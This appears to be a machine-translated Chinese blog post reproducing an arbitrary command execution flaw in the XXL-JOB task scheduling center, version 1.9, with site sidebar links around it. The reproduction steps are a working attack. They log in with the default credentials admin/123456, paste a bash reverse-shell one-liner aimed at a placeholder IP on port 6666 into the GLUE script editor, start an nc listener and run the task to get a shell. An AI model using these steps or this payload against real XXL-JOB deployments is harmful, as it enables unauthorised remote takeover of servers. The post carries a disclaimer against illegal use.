当前位置:网站首页>Repetition XXL - JOB scheduling center background arbitrary command execution
Repetition XXL - JOB scheduling center background arbitrary command execution
2022-07-30 04:32:00 【xiaochuhe.】
Warning
Do not use the content mentioned in this article violating the law.
This article no warranties
Table of Contents
Three, vulnerability recurrence
I. VulnerabilityDescription
XXL-JOB Task Scheduling Center Attackers can obtain server permissions by writing shell commands for task scheduling in the background.
Second, the affected version
- xxl-job version 1.9 system
III. Vulnerability recurrence
1. The default password is admin/123456, and a task will be added to the login background
2. Click GLUE IDE to edit the script and enter the following commands:
#!/bin/bashbash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'
3.vps nc starts monitoring:
4. Click to execute, bounce the shell
边栏推荐
- 成为一个合格的网安,你知道这些吗?
- 山西省第二届网络安全技能大赛(企业组)部分赛题WP(十)
- 文件系统二
- VUX Datetime 组件compute-days-function动态设置日期列表
- The implementation and basic operation of sub-database sub-table, ER table, global table, fragmentation rules, global sequence, etc. in MyCat
- LeetCode 114. Expand Binary Tree into Linked List (One Question Three Eats)
- SQL introduction of the first lecture -- MySQL 8.0.29 installation tutorial (Windows 64 - bit)
- Android Studio implements login registration - source code (connecting to MySql database)
- Boss Rush (二分答案 + 状压DP)
- js 操作在当前日期加减(天、周、月、年数)
猜你喜欢
The underlying mechanism of the function
labelme的使用技巧
复现XXL-JOB 任务调度中心后台任意命令执行漏洞
unity初学5 摄像机跟随,边界控制以及简单的粒子控制(2d)
PyG builds R-GCN to realize node classification
2.4 hill sorting
MySQL String Concatenation - Various String Concatenation Practical Cases
图像视角矫正之透视变换矩阵(单应矩阵)/findHomography 与 getPerspectiveTransformd的区别
验证addShutdownHook钩子生效
How does MySql find out the latest data row that meets the conditions?
随机推荐
What is the data directory?Why do you need it?
Many overseas authoritative media hotly discuss TRON: laying the foundation for the decentralization of the Internet
[Redis Master Cultivation Road] Jedis - the basic use of Jedis
Reverse Analysis Practice 2
Thinkphp 5.0.24 Variable Override Vulnerability Causes RCE Analysis
Android Studio implements login registration - source code (connecting to MySql database)
How does MySql find out the latest data row that meets the conditions?
深圳见!云原生加速应用构建专场:来看云原生 FinOps、SRE、高性能计算场景最佳实践
golang八股文整理(持续搬运)
How to compare struct, slice, map for equality and the difference between several comparison methods in golang
Go 学习笔记(84)— Go 项目目录结构
2021 Shandong Province Network Construction and Application Test Questions
2.6归并排序
How to extract year, month and day data in date type in SQL Server
MySQL 字符串拼接 - 多种字符串拼接实战案例
Advanced [C] array to participate in the function pointer
New LaaS protocol Elephant Swap provides ePLATO with sustainable premium space
High Concurrency Framework Disruptor
Become a qualified cybersecurity, do you know this?
MySQL operation statement Daquan (detailed)